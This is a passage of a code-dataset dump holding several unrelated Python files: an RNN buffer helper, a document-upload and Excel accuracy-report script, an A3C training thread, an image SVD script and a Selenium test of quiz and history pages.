\n \n def _copy_into_template(self, arr):\n \"\"\" From template, copies values in for rnn input \"\"\"\n copy = self.rnn_input_template\n copy[-len(arr):] = arr[:]\n return copy\n \n \n def get_rnn_input(self):\n assert self.rnn_input ## Buffer not initialised with rnn_input\n arr = self.get_vals_at_steps_reversed()\n diff_arr = self.get_diff_array(arr)\n if diff_arr.shape[0] is 0:\n return self.rnn_input_template\n ## Catches beginning if not enough input is given, possibly too short a hold period\n return self._copy_into_template(diff_arr)\n \n \n def _get_rnn_in_template(self):\n return np.zeros(self.buffer_length)[::-self.step]\n \n ","sub_path":"src/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3948,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"65802250","text":"from typing import Optional\nfrom config import subType, host, username, password, resourceURL, webSocketSessionId, upload_json, uploadURL, \\\n accepted_formats, folder_to_process\nfrom xlsxwriter.utility import xl_range, xl_rowcol_to_cell\nfrom xlsxwriter.worksheet import (\n Worksheet, cell_number_tuple, cell_string_tuple)\nimport requests\nimport json\nimport os\nimport time\nimport pandas as pd\nimport datetime\nimport xlsxwriter\n\n\n# ---- Uploading documents to iMatch and get extracted data points ----\ndef authenticate(auth_url, auth_username, auth_password):\n \"\"\"\n Authenticate to iMatch\n :param auth_url: Host URL\n :param auth_username: Configured in config.py\n :param auth_password: auth_username: Configured in config.py\n :return: Bearer Token if successful authentication. 
Or else Boolean False.\n \"\"\"\n auth_url = auth_url + \"/api/authenticate\"\n payload = \"\"\n\n headers = {\n 'Content-Type': \"application/json\",\n 'username': auth_username,\n 'password': auth_password,\n 'Accept': \"*/*\",\n 'Accept-Encoding': \"gzip, deflate\",\n 'Content-Length': \"0\",\n 'Connection': \"keep-alive\",\n 'cache-control': \"no-cache\"\n }\n\n return_value = False\n\n try:\n authenticate_tries_counter = 0\n while authenticate_tries_counter < 5:\n authenticate_tries_counter = authenticate_tries_counter + 1\n response = requests.request(\"POST\", auth_url, data=payload, headers=headers)\n if response.status_code == 200:\n return_value = json.loads(response.content)['id_token']\n authenticate_tries_counter = authenticate_tries_counter + 6\n else:\n time.sleep(3)\n except ConnectionError:\n pass\n\n return return_value\n\n\nif authenticate(auth_url=host, auth_username=username, auth_password=password):\n authorization_token = \"Bearer \" + authenticate(auth_url=host, auth_username=username, auth_password=password)\nelse:\n authorization_token = False\n\n\ndef get_processed_file_data(file_id, resource_url=resourceURL):\n \"\"\"\n :param file_id: File ID\n :param resource_url: iMatch Resource URL\n :return: returns file response\n \"\"\"\n headers = {'Authorization': authorization_token}\n resource_url = resource_url + file_id\n print(\"File is in Pipeline\")\n while True:\n time.sleep(1)\n file_response = requests.get(resource_url, headers=headers)\n if file_response.json()['textPlain'] is not None:\n break\n\n print(\"File is processed\")\n return file_response.json()\n\n\ndef upload_file(file):\n \"\"\"\n :param file: file id from iMatch\n :return:\n \"\"\"\n if authorization_token:\n headers = {'Authorization': authorization_token}\n\n files = {\n 'file': file,\n 'webSocketSessionId': webSocketSessionId,\n 'json': upload_json,\n }\n response = requests.post(uploadURL, headers=headers, files=files)\n\n return response.content\n else:\n print(\"Authentication Failed\")\n return False\n\n\n# Get first file and store the data\ndef get_data_labels(file_dir):\n image_test = open(file_dir, 'rb')\n upload_response = upload_file(image_test)\n print(json.loads(upload_response))\n counter = 0\n while \"error\" in json.loads(upload_response):\n print(\"Retrying\")\n time.sleep(1)\n counter = counter + 1\n upload_response = upload_file(image_test)\n if counter > 5:\n upload_response = False\n print(\"Retired 5 times. 
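# The upload retry loops in this script re-submit a bounded number of times
# with a short sleep. A reusable helper capturing that idea (an assumed
# sketch; the script itself inlines the loop):
import time

def retry_upload(do_upload, is_error, attempts=5, delay=1.0):
    for attempt in range(attempts + 1):
        result = do_upload()
        if not is_error(result):
            return result
        if attempt < attempts:
            time.sleep(delay)
    return False  # mirrors the script's convention of returning False on failure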
Skipping the file for now\")\n break\n\n file_id = json.loads(upload_response)['identifier']\n file_data = get_processed_file_data(file_id, resourceURL)\n list_of_datapoint_names = ['file_name', 'imatch_id']\n\n data = file_data['sections'][0]['attributes']\n for j in range(len(data)):\n list_of_datapoint_names.append(data[j]['key'])\n\n for keys in file_data['sections'][0]:\n if keys == \"children\":\n data = file_data['sections'][0][keys]\n for i in range(len(data)):\n attributes = data[i]['attributes']\n for j in range(len(attributes)):\n list_of_datapoint_names.append(attributes[j]['key'])\n\n return {datapoint_name: None for datapoint_name in list_of_datapoint_names}\n\n\ndef process_folder(path):\n \"\"\"\n :param path: Process the folder\n :return: None\n \"\"\"\n os.chdir(path)\n os.makedirs(os.getcwd() + '/html_output', exist_ok=True)\n completed = ['.'.join(i.split('.')[:-1]) for i in os.listdir(os.getcwd() + '/html_output')]\n images = [im for im in os.listdir() if im.split('.')[-1] in accepted_formats]\n\n if images:\n first_file = images[0]\n file_path = os.getcwd() + '/' + first_file\n data_dict_template = get_data_labels(file_path)\n file_info = pd.DataFrame(columns=[keys for keys in data_dict_template.keys()])\n number_of_images = 0\n\n for image in images:\n number_of_images = number_of_images + 1\n if '.'.join(image.split('.')[:-1]) in completed:\n print('Skipped', image)\n continue\n else:\n print(\"Processing the {}\".format(image))\n image_bin = open(image, 'rb')\n upload_response = upload_file(image_bin)\n\n counter = 0\n while \"error\" in json.loads(upload_response):\n print(\"Retrying\")\n counter = counter + 1\n upload_response = upload_file(image)\n if counter > 5:\n upload_response = False\n print(\"Retired 5 times. Skipping the file for now\")\n break\n\n if upload_response:\n file_id = json.loads(upload_response)['identifier']\n file_data = get_processed_file_data(file_id, resourceURL)\n with open(os.getcwd() + '/html_output/'\n + '.'.join(image.split('.')[:-1]) + '.html', 'w', encoding='utf-8') as f:\n f.write(file_data['textPlain']['ENGLISH'])\n\n data_dict_template['file_name'] = file_data['information']['fileName']\n data_dict_template['imatch_id'] = file_data['id']\n data = file_data['sections'][0]['attributes']\n\n for j in range(len(data)):\n # this loop is used to obtain data point if the\n # data is not hidden under a drop down menu\n # in iMatch UI\n key = data[j]['key']\n value = data[j]['values'][0]['originalValue']\n data_dict_template[key] = value\n\n for keys in file_data['sections'][0]:\n # this loop is used to obtain data point if the\n # data is hidden under a drop down menu in\n # iMatch UI\n if keys == \"children\":\n data = file_data['sections'][0][keys]\n if len(data) != 0:\n # this conditional will run when there is\n # a data point with multiple data values\n for sub_key in data[0]:\n if sub_key == 'children':\n sub_data = data[0][sub_key]\n for index in range(len(sub_data)):\n sub_data_attributes = sub_data[index]['attributes']\n for j in range(len(sub_data_attributes)):\n key = sub_data_attributes[j]['key'] + '_' + str(index+1)\n if key not in file_info.columns.tolist():\n file_info[key] = \"\"\n value = sub_data_attributes[j]['values'][0]['originalValue']\n data_dict_template[key] = value\n\n for i in range(len(data)):\n attributes = data[i]['attributes']\n for j in range(len(attributes)):\n key = attributes[j]['key']\n value = attributes[j]['values'][0]['originalValue']\n data_dict_template[key] = value\n\n 
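# The nested loops above flatten iMatch's section/attributes/children JSON
# into one flat row dict. A compact recursive near-equivalent, assuming the
# same payload shape (the helper name is hypothetical):
def flatten_section(section, out=None, suffix=""):
    out = {} if out is None else out
    for attr in section.get("attributes", []):
        values = attr.get("values", [])
        if values:
            out[attr["key"] + suffix] = values[0]["originalValue"]
    for index, child in enumerate(section.get("children", []), start=1):
        flatten_section(child, out, suffix="_%d" % index)
    return out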
file_info.loc[number_of_images] = [values for values in data_dict_template.values()]\n # this loop will flush out the dictionary for every documents uploaded\n for key in data_dict_template.keys():\n data_dict_template[key] = \"\"\n\n d = datetime.datetime.today()\n now = '{0:0=2d}_{1:0=2d}_{2:0=4d}-{3:0=2d}_{4:0=2d}_{5:0=2d}'.format(d.month,\n d.day,\n d.year,\n d.hour,\n d.minute,\n d.second)\n\n out_file_name = now + \"_output.csv\"\n file_info.to_csv(out_file_name, index=False)\n file_info = file_info.drop(\"imatch_id\", axis=1)\n out_file_name = \"compare\" + out_file_name\n file_info.to_csv(out_file_name, index=False)\n print(\"All files are processed\")\n return out_file_name\n\n\nfile_name = process_folder(folder_to_process)\n\n# ----- Generating Accuracy Report -----\n# subType header strings\nsubtype_header = [\"Document Name\", \"Data Point Name\",\n \"Expect Data\", \"Extract Data\",\n \"Total\", \"Partial\",\n \"Noisy\", \"Correct\"]\n\n# Document accuracy header strings\ndoc_accuracy_header = [\"Document Name\", \"Total\",\n \"Partial\", \"Noisy\",\n \"Correct\", \"Accuracy % with Noise\",\n \"Accuracy % without Noise\", \"Accuracy % with Partial Correct\"]\n\n# Data point accuracy header strings\ndata_point_accuracy_header = [\"Data Point Name\", \"Total\",\n \"Partial\", \"Noisy\",\n \"Correct\", \"Accuracy % with Noise\",\n \"Accuracy % without Noise\", \"Accuracy % with Partial Correct\"]\n\n# File that will be used to generate accuracy report\nextracted_file_path = folder_to_process + file_name + \".csv\"\n\n# Read CSV files into data frames\ncompare_data = pd.read_csv(file_name, dtype=str)\n\n# Fill any missing values\ndf1 = compare_data.fillna(\"\")\n\n# Creating data points list\ndata_point_list = list(df1.columns)\ndata_point_list.pop(0)\n\n# Creating empty dictionary for each data points that will be used\n# for data point accuracy sheet\ntotal_dict = {}\npartial_dict = {}\nnoisy_dict = {}\ncorrect_dict = {}\n\n# Adding a key of each data points with value of an empty list that will be\n# filled with respective cells of the data points to all created dictionaries\nfor data_point in data_point_list:\n total_dict[data_point] = []\n partial_dict[data_point] = []\n noisy_dict[data_point] = []\n correct_dict[data_point] = []\n\n# --- Functions ---\n# Function to add cells to each data point list within each dictionaries\ndef add_cells_to_dict(dicts_list, dp_row_index, dp_column_index):\n dicts_list.append(xl_rowcol_to_cell(dp_row_index, dp_column_index))\n\n# Borrowed function from karolyi at Stackoverflow to get column width\ndef get_column_width(worksheet: Worksheet, column: int) -> Optional[int]:\n \"\"\"Get the max column width in a `Worksheet` column.\"\"\"\n strings = getattr(worksheet, '_ts_all_strings', None)\n if strings is None:\n strings = worksheet._ts_all_strings = sorted(\n worksheet.str_table.string_table,\n key=worksheet.str_table.string_table.__getitem__)\n lengths = set()\n for row_id, colums_dict in worksheet.table.items(): # type: int, dict\n data = colums_dict.get(column)\n if not data:\n continue\n if type(data) is cell_string_tuple:\n iter_length = len(strings[data.string])\n if not iter_length:\n continue\n lengths.add(iter_length)\n continue\n if type(data) is cell_number_tuple:\n iter_length = len(str(data.number))\n if not iter_length:\n continue\n lengths.add(iter_length)\n if not lengths:\n return None\n return max(lengths)\n\n# Borrowed function from karolyi at Stackoverflow to set column autowidth\ndef set_column_autowidth(worksheet: 
Worksheet, column: int):\n \"\"\"\n Set the width automatically on a column in the `Worksheet`.\n !!! Make sure you run this function AFTER having all cells filled in\n the worksheet!\n \"\"\"\n maxwidth = get_column_width(worksheet=worksheet, column=column)\n if maxwidth is None:\n return\n worksheet.set_column(first_col=column, last_col=column, width=(maxwidth * 1.3))\n# --- ---\n\n# Create a workbook and add a worksheet.\nsheet_name = subType + \"_Accuracy_Report.xlsx\"\nworkbook = xlsxwriter.Workbook(sheet_name)\nworksheet1 = workbook.add_worksheet(subType)\nworksheet2 = workbook.add_worksheet(\"Document Accuracy\")\nworksheet3 = workbook.add_worksheet(\"Data Point Accuracy\")\nworksheet_list = [worksheet1, worksheet2, worksheet3]\n\n# --- Formatting ---\nbold = workbook.add_format({'bold': True,\n 'bg_color': '#DDDDDD',\n 'border': 1,\n 'font_size': 14,\n 'align': 'center'})\n\n# Row and column index\nrow_index = 0\ncol_index = 0\n\n# Creating header for each worksheet\nfor worksheet in worksheet_list:\n if worksheet == worksheet1:\n for header in subtype_header:\n worksheet.write(0, col_index, header, bold)\n col_index += 1\n col_index = 0\n if worksheet == worksheet2:\n for header in doc_accuracy_header:\n worksheet.write(0, col_index, header, bold)\n col_index += 1\n col_index = 0\n if worksheet == worksheet3:\n for header in data_point_accuracy_header:\n worksheet.write(0, col_index, header, bold)\n col_index += 1\n col_index = 0\n\n# --- subType Sheet ---\ndoc_name_cell_list = []\ndp_count_cell_list = []\n\n# -- Writing all document name to column A --\nsubtype_doc_name_row_index = 1\nsubtype_doc_name_list = df1['file_name'].tolist()\ndata_point_len = len(data_point_list) + 1\n\nfor doc_name in subtype_doc_name_list:\n worksheet1.write(subtype_doc_name_row_index, 0, doc_name)\n doc_name_cell_list.append(xl_rowcol_to_cell(subtype_doc_name_row_index, 0))\n subtype_doc_name_row_index += data_point_len\n\n# -- Writing all data points to column B --\nsubtype_data_point_row_index = 2\nfor i in range(0, len(subtype_doc_name_list)):\n for data_point in data_point_list:\n worksheet1.write(subtype_data_point_row_index, 1, data_point)\n # Add cells of respective total, partial, correct, and\n # noisy to dictionary list\n total_list = total_dict[data_point]\n partial_list = partial_dict[data_point]\n correct_list = correct_dict[data_point]\n noisy_list = noisy_dict[data_point]\n add_cells_to_dict(total_list, subtype_data_point_row_index, 4)\n add_cells_to_dict(partial_list, subtype_data_point_row_index, 5)\n add_cells_to_dict(correct_list, subtype_data_point_row_index, 6)\n add_cells_to_dict(noisy_list, subtype_data_point_row_index, 7)\n subtype_data_point_row_index += 1\n subtype_data_point_row_index += 1\n\n# -- Writing all extracted data to column D --\nsubtype_extracted_data_row_index = 2\noutput_transpose = df1.drop(['file_name'], axis=1).T.rename_axis('Datapoint Name')\ncolumn_name = []\nfor i in range(0, len(output_transpose.columns)):\n column_name.append(str(i))\noutput_transpose.columns = column_name\nextracted_data_df = output_transpose\nfor name in column_name:\n extracted_data_list = extracted_data_df[name].tolist()\n for extracted_data in extracted_data_list:\n worksheet1.write(subtype_extracted_data_row_index, 3, extracted_data)\n subtype_extracted_data_row_index += 1\n subtype_extracted_data_row_index += 1\n\n# -- Writing all data points formula to column E, F, G, H --\nsubtype_formula_column_index_list = [4, 5, 6, 7]\ntemp_dict = {}\nfor i in 
subtype_formula_column_index_list:\n subtype_formula_row_index = 1\n range_start_index = 2\n temp_dict[i] = []\n temp_list = temp_dict[i]\n for j in range(0, len(subtype_doc_name_list)):\n range_end_index = range_start_index + len(data_point_list) - 1\n data_point_range = xl_range(range_start_index, i, range_end_index, i)\n worksheet1.write(subtype_formula_row_index, i, '=SUM(' + data_point_range + ')')\n temp_list.append(xl_rowcol_to_cell(subtype_formula_row_index, i))\n range_start_index += len(data_point_list) + 1\n subtype_formula_row_index += len(data_point_list) + 1\n dp_count_cell_list.append(temp_dict[i])\n\n# Set columns autowidth\nfor i, header in enumerate(subtype_header):\n set_column_autowidth(worksheet1, i)\n\n# --- Document Accuracy ---\n# -- Writing all document names to column A --\n# -- based on document name on subType sheet --\ndoc_accuracy_doc_name_row_index = 1\nfor doc in subtype_doc_name_list:\n worksheet2.write(doc_accuracy_doc_name_row_index, 0, doc)\n doc_accuracy_doc_name_row_index += 1\n\n# -- Writing all data point flags to column B, C, D, E --\ndp_count_column_index_list = [1, 2, 3, 4]\ntemp_dict = {}\nfor i in range(0, len(dp_count_column_index_list)):\n temp_dict[dp_count_column_index_list[i]] = dp_count_cell_list[i]\n\nfor i in dp_count_column_index_list:\n dp_count_row_index = 1\n for dp_count in temp_dict[i]:\n worksheet2.write(dp_count_row_index, i, '=' + subType + '!' + dp_count)\n dp_count_row_index += 1\n\n# -- Writing accuracy formula to column G, H, I --\ndef accuracy_score(work_sheet, cell_list):\n # Creating 0.00% cell format\n cell_format = workbook.add_format()\n cell_format.set_num_format(10)\n\n formula_row_index = 1\n for index in range(0, len(cell_list)):\n correct_cell = xl_rowcol_to_cell(formula_row_index, 4)\n noise_cell = xl_rowcol_to_cell(formula_row_index, 3)\n partial_cell = xl_rowcol_to_cell(formula_row_index, 2)\n total_cell = xl_rowcol_to_cell(formula_row_index, 1)\n work_sheet.write(formula_row_index, 5,\n '=' + correct_cell + '/' + total_cell, cell_format)\n work_sheet.write(formula_row_index, 6,\n '=' + correct_cell + '/(' + total_cell + '-' + noise_cell + ')',\n cell_format)\n work_sheet.write(formula_row_index, 7,\n '=(' + correct_cell + '+(' + partial_cell + '*0.5))/' + total_cell,\n cell_format)\n formula_row_index += 1\n\naccuracy_score(worksheet2, doc_name_cell_list)\n\n# Set columns autowidth\nfor i, header in enumerate(doc_accuracy_header):\n set_column_autowidth(worksheet2, i)\n\n# --- Document Accuracy ---\n# -- Writing all data points names to column A --\ndp_accuracy_dp_name_row_index = 1\nfor data_point in data_point_list:\n worksheet3.write(dp_accuracy_dp_name_row_index, 0, data_point)\n dp_accuracy_dp_name_row_index += 1\n\n# -- Writing the summation of each data points to column B, C, D, E\ndef summation_string(string_list):\n sum_string = '=SUM('\n for string in string_list:\n if string != string_list[-1]:\n sum_string += subType + '!' + string + ','\n else:\n sum_string += subType + '!' 
+ string + ')'\n return sum_string\n\ndp_accuracy_row_index = 1\nfor data_point in data_point_list:\n dict_list = [total_dict[data_point], partial_dict[data_point], correct_dict[data_point], noisy_dict[data_point]]\n dp_accuracy_column_index_list = [1, 2, 3, 4]\n for column_index in dp_accuracy_column_index_list:\n\n worksheet3.write(dp_accuracy_row_index, column_index, summation_string(dict_list[(column_index - 1)]))\n dp_accuracy_row_index += 1\n\n# -- Writing accuracy formula to column G, H, I --\naccuracy_score(worksheet3, data_point_list)\n\n# Set columns autowidth\nfor i, header in enumerate(data_point_accuracy_header):\n set_column_autowidth(worksheet3, i)\n\nworkbook.close()\n","sub_path":"QA Automation/processFolder.py","file_name":"processFolder.py","file_ext":"py","file_size_in_byte":20719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"598075498","text":"# -*- coding: utf-8 -*-\nimport tensorflow as tf\nimport numpy as np\nimport random\nimport time\nimport sys\nimport gym\n\nfrom game_state import GameState\nfrom game_network import GameACFFNetwork\n\nimport constants as Constants\n\nLOG_INTERVAL = 100\nPERFORMANCE_LOG_INTERVAL = 1000\n\nclass A3CTrainingThread(object):\n def __init__(self, env, threadIndex, global_network, initialLearningRate, learningRateInput,\n grad_applier, maxGlobalTimeStep, saveData, device):\n\n self.env = env\n self.saveData = saveData\n self.threadIndex = threadIndex\n self.learningRateInput = learningRateInput\n self.maxGlobalTimeStep = maxGlobalTimeStep\n self.local_network = GameACFFNetwork(Constants.ACTION_SIZE, device)\n\n self.local_network.prepare_loss(Constants.ENTROPY_BETA)\n with tf.device(device):\n # var_refs = [v.ref() for v in self.local_network.get_vars()]\n var_refs = self.local_network.get_vars()\n self.gradients = tf.gradients(self.local_network.total_loss, var_refs, gate_gradients=False,\n aggregation_method=None, colocate_gradients_with_ops=False)\n\n self.apply_gradients = grad_applier.apply_gradients(global_network.get_vars(), self.gradients)\n self.sync = self.local_network.sync_from(global_network)\n self.local_t = 0\n self.maxEpReward = 0\n self.prev_local_t = 0\n self.episodeReward = 0\n self.initialLearningRate = initialLearningRate\n\n def _anneal_learning_rate(self, globalTimeStep):\n return max(0, self.initialLearningRate * (self.maxGlobalTimeStep - globalTimeStep) / self.maxGlobalTimeStep)\n\n def choose_action(self, pi_values):\n return np.random.choice(range(len(pi_values)), p=pi_values)\n\n def _record_score(self, sess, summary_writer, summary_op, score_input, score, global_t, pi):\n summary_str = sess.run(summary_op, feed_dict={ score_input: score })\n summary_writer.add_summary(summary_str, global_t)\n summary_writer.flush()\n\n if self.threadIndex == 0:\n print('****** ADDING NEW SCORE ******')\n self.saveData.append(score, pi)\n if score > Constants.SAVE_SCORE_THRESHOLD:\n self.saveData.requestSave()\n\n def set_start_time(self, start_time):\n self.start_time = start_time\n\n def perfLog(self, global_t):\n if (self.threadIndex == 0) and (self.local_t - self.prev_local_t >= PERFORMANCE_LOG_INTERVAL):\n self.prev_local_t += PERFORMANCE_LOG_INTERVAL\n elapsedTime = time.time() - self.start_time\n stepsPerSec = global_t / elapsedTime\n print(\"### Performance : {} STEPS in {:.0f} sec. {:.0f} STEPS/sec. 
{:.2f}M STEPS/hour\".format(\n global_t, elapsedTime, stepsPerSec, stepsPerSec * 3600 / 1000000.))\n\n def process(self, sess, global_t, summary_writer, summary_op, score_input):\n # ohe - do these have to be self.states? or something else?\n states = []\n actions = []\n rewards = []\n values = []\n\n terminal_end = False\n sess.run( self.sync )\n start_local_t = self.local_t\n\n # t_max times loop\n for i in range(Constants.LOCAL_T_MAX):\n pi_, value_ = self.local_network.run_policy_and_value(sess, self.game_state.S)\n action = self.choose_action(pi_)\n\n states.append(self.game_state.S)\n actions.append(action)\n values.append(value_)\n\n # change this to observe all the indices\n if (self.threadIndex == 0) and (self.local_t % LOG_INTERVAL == 0):\n print(\"pi={}\".format(pi_))\n print(\" V={}\".format(value_))\n\n # process game\n self.game_state.process(action)\n\n # receive game result\n reward = self.game_state.reward\n terminal = self.game_state.terminal\n\n self.episodeReward += reward\n\n # adding in early termination\n if self.episodeReward > self.maxEpReward:\n self.maxEpReward = self.episodeReward\n\n if self.maxEpReward - self.episodeReward > 5:\n terminal = True\n\n # clip reward\n rewards.append( np.clip(reward, -1, 1) )\n\n self.local_t += 1\n self.game_state.update()\n\n if terminal:\n terminal_end = True\n print(\"score={}\".format(self.episodeReward))\n\n self._record_score(sess, summary_writer, summary_op, score_input, self.episodeReward, global_t, pi_)\n\n self.maxEpReward = 0 #ohe\n self.episodeReward = 0\n\n self.game_state.reset()\n break\n\n R = 0.0 if terminal_end else self.local_network.run_value(sess, self.game_state.S)\n\n actions.reverse()\n states.reverse()\n rewards.reverse()\n values.reverse()\n\n batch_si = []\n batch_a = []\n batch_td = []\n batch_R = []\n\n # compute and accumulate gradients\n for (ai, ri, si, Vi) in zip(actions, rewards, states, values):\n R = ri + Constants.DISCOUNT * R\n td = R - Vi\n a = np.zeros([Constants.ACTION_SIZE])\n a[ai] = 1\n\n batch_si.append(si)\n batch_a.append(a)\n batch_td.append(td)\n batch_R.append(R)\n\n cur_learning_rate = self._anneal_learning_rate(global_t)\n sess.run( self.apply_gradients,\n feed_dict = {\n self.local_network.s: batch_si,\n self.local_network.a: batch_a,\n self.local_network.td: batch_td,\n self.local_network.r: batch_R,\n self.learningRateInput: cur_learning_rate} )\n\n self.perfLog(global_t)\n\n # return advanced local step size\n diff_local_t = self.local_t - start_local_t\n return diff_local_t\n\n","sub_path":"Scripts/oguzelibol-CarRacingA3C/a3c_thread.py","file_name":"a3c_thread.py","file_ext":"py","file_size_in_byte":5585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"138429222","text":"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport matplotlib.image as mpimg\r\n#import cv2\r\nimport numpy as np\r\nimport matplotlib\r\nfrom scipy import linalg\r\nfrom PIL import Image\r\n\r\nmatplotlib.rcParams['backend'] = \"Qt4Agg\"\r\n\r\n\r\nimg=mpimg.imread('2_Picture.jpg')\r\n[r,g,b] = [img[:,:,i] for i in range(3)]\r\n\r\n\r\nfig = plt.figure(1)\r\nax1 = fig.add_subplot(3,2,1)\r\nax2 = fig.add_subplot(3,2,2)\r\nax3 = fig.add_subplot(3,2,3)\r\nax4 = fig.add_subplot(3,2,4)\r\nax1.imshow(img)\r\nax2.imshow(r, cmap = 'Reds')\r\nax3.imshow(g, cmap = 'Greens')\r\nax4.imshow(b, cmap = 'Blues')\r\n#plt.show()\r\n\r\n\r\n# This function is called to count the number of non-zero singular values of (M,N)\r\ndef countNotZero(numList):\r\n count = 0\r\n for num 
in numList:\r\n if num != 0:\r\n count +=1\r\n return count\r\n \r\ndef takeNotZero(numList,numTake):\r\n count = 0\r\n newList = []\r\n for num in numList:\r\n if(count Upload video entry-> Go to add new quiz -> Open KEA -> Create new quiz -> Go to My History -> Check that quiz entry isn't displayed ->\n # Play entry -> Go to My History page and make sure that entry exists in page Go to home page and make sure entry displayed in recently watched list-> \n # test cleanup: deleting the uploaded file\n #================================================================================================================================\n testNum = \"2757\"\n enableProxy = False\n \n supported_platforms = clsTestService.updatePlatforms(testNum)\n \n status = \"Pass\"\n timeout_accured = \"False\"\n driver = None\n common = None\n # Test variables\n entryName= None\n entryNameQuiz = None\n questionNumber = 1\n entryDescription = \"description\"\n entryTags = \"tag1,\"\n playlist = 'Recently Watched '\n QuizQuestion1 = 'First question'\n QuizQuestion1Answer1 = 'First answer'\n QuizQuestion1AdditionalAnswers = ['Second answer', 'Third question', 'Fourth question']\n filePath = localSettings.LOCAL_SETTINGS_MEDIA_PATH + r'\\videos\\10sec_QR_mid_right.mp4'\n \n #run test as different instances on all the supported platforms\n @pytest.fixture(scope='module',params=supported_platforms)\n def driverFix(self,request):\n return request.param\n \n def test_01(self,driverFix,env):\n\n try:\n logStartTest(self,driverFix)\n ############################# TEST SETUP ###############################\n #capture test start time\n self.startTime = time.time()\n #initialize all the basic vars and start playing\n self,self.driver = clsTestService.initializeAndLoginAsUser(self, driverFix)\n self.common = Common(self.driver) \n ########################################################################\n self.entryName = clsTestService.addGuidToString('MyHistoryRecentlyWatchedAudio', self.testNum)\n ########################## TEST STEPS - MAIN FLOW ####################### \n self.entryName = clsTestService.addGuidToString('MyHistoryQuizEntry')\n self.entryNameQuiz = self.entryName + \" - Quiz\"\n self.entriesNames = [self.entryName, self.entryNameQuiz]\n ######################### TEST STEPS - MAIN FLOW #######################\n writeToLog(\"INFO\",\"Step 1: Going to upload video entry\")\n if self.common.upload.uploadEntry(self.filePath, self.entryName, self.entryDescription, self.entryTags, disclaimer=False) == None:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 1: FAILED failed to upload video entry\")\n return\n \n writeToLog(\"INFO\",\"Step 2: Going to navigate to uploaded entry page\")\n if self.common.entryPage.navigateToEntry(navigateFrom = enums.Location.UPLOAD_PAGE) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 2: FAILED to navigate to entry page\")\n return \n \n writeToLog(\"INFO\",\"Step 3: Going to wait until media will finish processing\")\n if self.common.entryPage.waitTillMediaIsBeingProcessed() == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 3: FAILED - New entry is still processing\")\n return\n \n writeToLog(\"INFO\",\"Step 4: Going to navigate to add new video quiz\")\n if self.common.upload.addNewVideoQuiz() == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 4: FAILED to click video quiz\")\n return \n \n writeToLog(\"INFO\",\"Step 5: Going to search the uploaded entry and open KEA\")\n if 
self.common.kea.searchAndSelectEntryInMediaSelection(self.entryName, False) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 5: FAILED to find entry and open KEA\")\n return \n \n writeToLog(\"INFO\",\"Step 6: Going to start quiz and add questions\")\n if self.common.kea.addQuizQuestion(self.QuizQuestion1, self.QuizQuestion1Answer1, self.QuizQuestion1AdditionalAnswers) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 6: FAILED to start quiz and add questions\")\n return \n \n writeToLog(\"INFO\",\"Step 7: Going to save quiz and navigate to media page\")\n if self.common.kea.clickDone() == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 7: FAILED to save quiz and navigate to media page\")\n return \n sleep(5) \n writeToLog(\"INFO\",\"Step 8: Going to Search quiz entry in My History page\")\n if self.common.myHistory.waitTillLocatorExistsInMyHistory(self.entryNameQuiz) == True:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 8: FAILED - New entry is displayed in my history page\")\n return \n writeToLog(\"INFO\",\"Step 8: Previous Step Failed as Expected - The entry should not be displayed\") \n \n writeToLog(\"INFO\",\"Step 9: Going to play entry\")\n if self.common.player.navigateToQuizEntryAndClickPlay(self.entryNameQuiz, self.questionNumber) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 9: FAILED to navigate and play entry\")\n return \n \n writeToLog(\"INFO\",\"Step 10: Going to switch to default content\")\n if self.common.base.switch_to_default_content() == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 10: FAILED to switch to default content\")\n return \n \n writeToLog(\"INFO\",\"Step 11: Going to navigate to my history and check for entry\")\n if self.common.myHistory.waitTillLocatorExistsInMyHistory(self.entryNameQuiz) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 11: FAILED find entry in my history\")\n return \n sleep(5)\n writeToLog(\"INFO\",\"Step 12: Going to navigate to home page and check entry in recently watched list\")\n if self.common.home.checkEntryInHomePlaylist(self.playlist, self.entryName) == False:\n self.status = \"Fail\"\n writeToLog(\"INFO\",\"Step 12: FAILED to find entry in recently watched list\")\n return \n #########################################################################\n writeToLog(\"INFO\",\"TEST PASSED\")\n # If an exception happened we need to handle it and fail the test \n except Exception as inst:\n self.status = clsTestService.handleException(self,inst,self.startTime)\n \n ########################### TEST TEARDOWN ########################### \n def teardown_method(self,method):\n try:\n self.common.handleTestFail(self.status) \n writeToLog(\"INFO\",\"**************** Starting: teardown_method **************** \")\n self.common.myMedia.deleteSingleEntryFromMyMedia(self.entryName)\n writeToLog(\"INFO\",\"**************** Ended: teardown_method *******************\")\n except:\n pass \n clsTestService.basicTearDown(self)\n #write to log we finished the test\n logFinishedTest(self,self.startTime)\n assert (self.status == \"Pass\") \n\n pytest.main('test_' + testNum + '.py --tb=line')\n","sub_path":"web/tests/myHistory/test_2757.py","file_name":"test_2757.py","file_ext":"py","file_size_in_byte":8399,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"52862599","text":"\n\ndef enqueue_welcome_emails(user: UserProfile) -> None:\n from zerver.context_processors import common_context\n if 
